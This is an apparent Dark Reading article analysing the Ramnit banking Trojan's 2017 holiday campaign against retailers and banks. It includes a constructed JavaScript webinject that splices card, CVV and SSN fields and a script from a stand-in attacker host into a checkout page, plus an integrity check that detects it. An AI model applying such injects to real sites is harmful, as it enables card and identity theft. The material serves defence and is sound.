Dark Reading, Partner Perspectives
2/1/2018 09:00 AM
Doron Voolf

Ramnit's Holiday Shopping Spree: Retailers & E-commerce

This past season, the authors of a traditional banking Trojan focused on what people do between Thanksgiving and New Year's Day: shop, eat, check their bank account, and entertain.

F5 security researchers recently analyzed the Ramnit banking Trojan campaign that was active over the holiday season and discovered it’s not much of a banking Trojan anymore. The research showed:

  • 64% of Ramnit's targets were retail e-commerce sites, including Amazon.com, BestBuy, Forever21, Gap, Zara, Carter’s, Oshkosh B’gosh, Macy’s, Victoria’s Secret, H&M, Overstock.com, Toys"R"Us, Zappos, and many others.
  • Although banks were a smaller portion of targets, the target list included some of the largest banks in the world, including Bank of America, CitiBank, PNC, Chase, TD Bank, and US Bank.
  • The C&C framework collecting the stolen user data is shared by several banking Trojans, including Ramnit, Gozi, GootKit, and Tinba.
  • The Ramnit command and control server is registered to a network in Russia, JSC MediaSoft Ekspert, that shows up often in F5 Labs threat research.
  • For the fraud to be accomplished, users must be tricked in several phases, pointing to the need for continued security awareness training.

Ramnit's authors likely had high hopes for this holiday shopping season when they added major online retailers to their target list, which makes sense for a threat actor trying to optimize an attack: why not cast the fraud net over sites that are certain to see heavy traffic over the holidays? Most financial organizations already recognize that the holiday season is also peak fraud season and raise their security posture accordingly. Financial institutions have also been targeted by banking Trojans for so long that most use advanced web defenses that detect when a user's browser is infected with a known Trojan.

Non-financial industries, on the other hand, traditionally haven't been targeted and are less likely to have the same defenses in place. So, instead of hunting for bank account credentials, the Ramnit authors zeroed in on credit card theft, harvesting social security numbers, mothers' maiden names, secret-question answers, and other critical personally identifiable information while the infected user interacted with the targeted site.

Ramnit Targets: Where People Shop, Eat & Entertain
Retailers and their e-commerce sites were clearly the biggest focus for the Ramnit authors; they accounted for 64% of the targets. Although banks represented a smaller portion, some of the largest banks in the world were included in their effort. The Ramnit authors covered what people do over the holidays: shop, eat, check their bank account, and entertain.

Ramnit 2017 Holiday Targets by Industry (Image Source: F5)

Expansion Is an Easy Shift
Webinjects, the HTML and JavaScript a banking Trojan inserts into a targeted page from inside the victim's browser, work the same way whether the page belongs to a bank or to a retailer. Users are also conditioned to be asked for extra information: when a user logs into a banking site, in some cases (for example, from a new device) the bank asks additional validation questions before granting account access, and most e-commerce sites ask for login details in order to collect more information about the user. Ramnit can inject an external script that adds a request of its own and asks the user for whatever it wants. In this campaign, the injected script asked for credit card information on top of other personal information, including the social security number.

Ramnit Infection Flow
For users to become victims, their device must first be infected with the Trojan. This typically happens through social engineering that tricks the user into clicking a malicious link or opening an attachment that downloads the malware. When the infected user then visits a targeted URL, Ramnit injects an external script into the requested page and sends the harvested data back to a C&C server named Tables.

Ramnit attack path (Image Source: F5)
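As an added example (not F5's research code and not Ramnit's actual inject configuration), the following JavaScript shows both sides of what the two preceding sections describe. A webinject rule splices extra card, CVV and SSN fields plus an external script into a constructed retailer checkout page; the rule's set_url / data_before / data_inject / data_after shape is modeled on the Zeus-style config format banking Trojans commonly reuse and is an assumption here, not taken from the Ramnit sample. A page-integrity check of the kind a web fraud protection ships to the browser then compares the rendered page against the fields and script origins the site expects. The page HTML, the domains (shop.example.com, cdn-verify.example.net) and the field names are all constructed.

```javascript
// Added example (not F5's or Ramnit's code): a man-in-the-browser webinject
// applied to a constructed checkout page, followed by the kind of page-integrity
// check a web fraud protection runs. The rule format (set_url, data_before,
// data_inject, data_after) mimics Zeus-style webinject configs; it is an
// assumption, as are the domains and field names below.

// Constructed sample: the page the retailer actually serves.
const SERVED_PAGE = `<html><body>
<form id="checkout" action="https://shop.example.com/checkout" method="post">
  <input name="email" type="text">
  <input name="password" type="password">
  <button type="submit">Sign in</button>
</form>
<script src="https://shop.example.com/static/app.js"></script>
</body></html>`;

// Constructed inject rule: ask for card, CVV, SSN and a secret-question answer
// right after the password box, and pull a script from a hypothetical
// attacker-controlled host.
const INJECT_RULE = {
  set_url: /shop\.example\.com\/checkout/,
  data_before: '<input name="password" type="password">',
  data_inject: `
  <p>For your security, please confirm your identity:</p>
  <input name="card_number" type="text">
  <input name="cvv" type="text">
  <input name="ssn" type="text">
  <input name="mother_maiden_name" type="text">
  <script src="https://cdn-verify.example.net/v.js"></script>`,
  data_after: '<button type="submit">',
};

// What the Trojan does inside the victim's browser: if the URL matches, replace
// whatever sits between the before/after anchors with data_inject. The rest of
// the page, the real domain and the TLS padlock are untouched.
function applyWebinject(url, html, rule) {
  if (!rule.set_url.test(url)) return html;
  const start = html.indexOf(rule.data_before);
  if (start === -1) return html;
  const insertAt = start + rule.data_before.length;
  const end = html.indexOf(rule.data_after, insertAt);
  if (end === -1) return html;
  return html.slice(0, insertAt) + rule.data_inject + html.slice(end);
}

// Simple regex extraction is enough for this constructed page; a real
// integrity agent would walk the live DOM instead.
function extractFieldNames(html) {
  return [...html.matchAll(/<input\b[^>]*\bname="([^"]+)"/gi)].map((m) => m[1]);
}

function extractScriptOrigins(html) {
  return [...html.matchAll(/<script\b[^>]*\bsrc="([^"]+)"/gi)].map((m) => new URL(m[1]).origin);
}

// The integrity check: the site knows which fields its form has and which
// origins may serve script. Anything else in the rendered page is a
// man-in-the-browser symptom; names that look like card or identity data are
// rated high because that is exactly what the campaign above harvested.
const EXPECTED_FIELDS = new Set(['email', 'password']);
const ALLOWED_SCRIPT_ORIGINS = new Set(['https://shop.example.com']);
const SENSITIVE_FIELD = /^(ssn|social.*|cvv|cvc|card_number|pin|mother_maiden_name)$/i;

function auditRenderedPage(html) {
  const findings = [];
  for (const name of extractFieldNames(html)) {
    if (EXPECTED_FIELDS.has(name)) continue;
    findings.push({ type: 'unexpected_field', name, severity: SENSITIVE_FIELD.test(name) ? 'high' : 'medium' });
  }
  for (const origin of extractScriptOrigins(html)) {
    if (!ALLOWED_SCRIPT_ORIGINS.has(origin)) {
      findings.push({ type: 'foreign_script', name: origin, severity: 'high' });
    }
  }
  return findings;
}

// Run it: the clean page passes, the injected page is flagged.
const URL_UNDER_TEST = 'https://shop.example.com/checkout';
const INJECTED_PAGE = applyWebinject(URL_UNDER_TEST, SERVED_PAGE, INJECT_RULE);
console.log(auditRenderedPage(SERVED_PAGE));   // []
console.log(auditRenderedPage(INJECTED_PAGE)); // four unexpected_field findings and one foreign_script finding
```

The point of the check is that it is served by the site itself and runs in the user's browser, so it sees the page the way the victim does. That is what lets it catch the injected fields even though the address bar shows the genuine domain and a valid certificate, which is why a user cannot be expected to spot the fraud on their own.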

There are two major lessons to be learned from this scenario:

Lesson 1: Regardless of industry, advanced web fraud protections should be widely adopted across high-traffic web properties that collect personally identifiable user data. What's notable about fraud on an e-commerce site versus a financial institution is that the impact is typically felt by the credit card issuers and by the users themselves, via identity theft, not by the e-commerce site directly. For a financial institution the impact is dollars drained out of bank accounts, which the bank must make good on behalf of the defrauded user. That process is time-consuming and expensive, which gives financial institutions an incentive to buy additional security controls. The typical e-commerce site might not feel the impact of banking Trojan fraud in the same way.

Lesson 2: Even though a user has been infected with malware, there are many steps that must be completed before the fraud succeeds. Security awareness is critical for combating this type of attack. Many financial institutions publish security pages with tips for identifying fraud, for example, telling users that customer service would never ask for a full social security number or a credit card CVV over the phone or on the web, and to be suspicious of web pages with broken English, incorrect grammar, spelling errors, and strange or misplaced characters.

Get the latest application threat intelligence from F5 Labs.

Working at F5 for almost five years, Doron handles and analyzes cyber threat investigations for most of the major malware families of recent years. Doron holds a Bachelor of Science in Computer Science.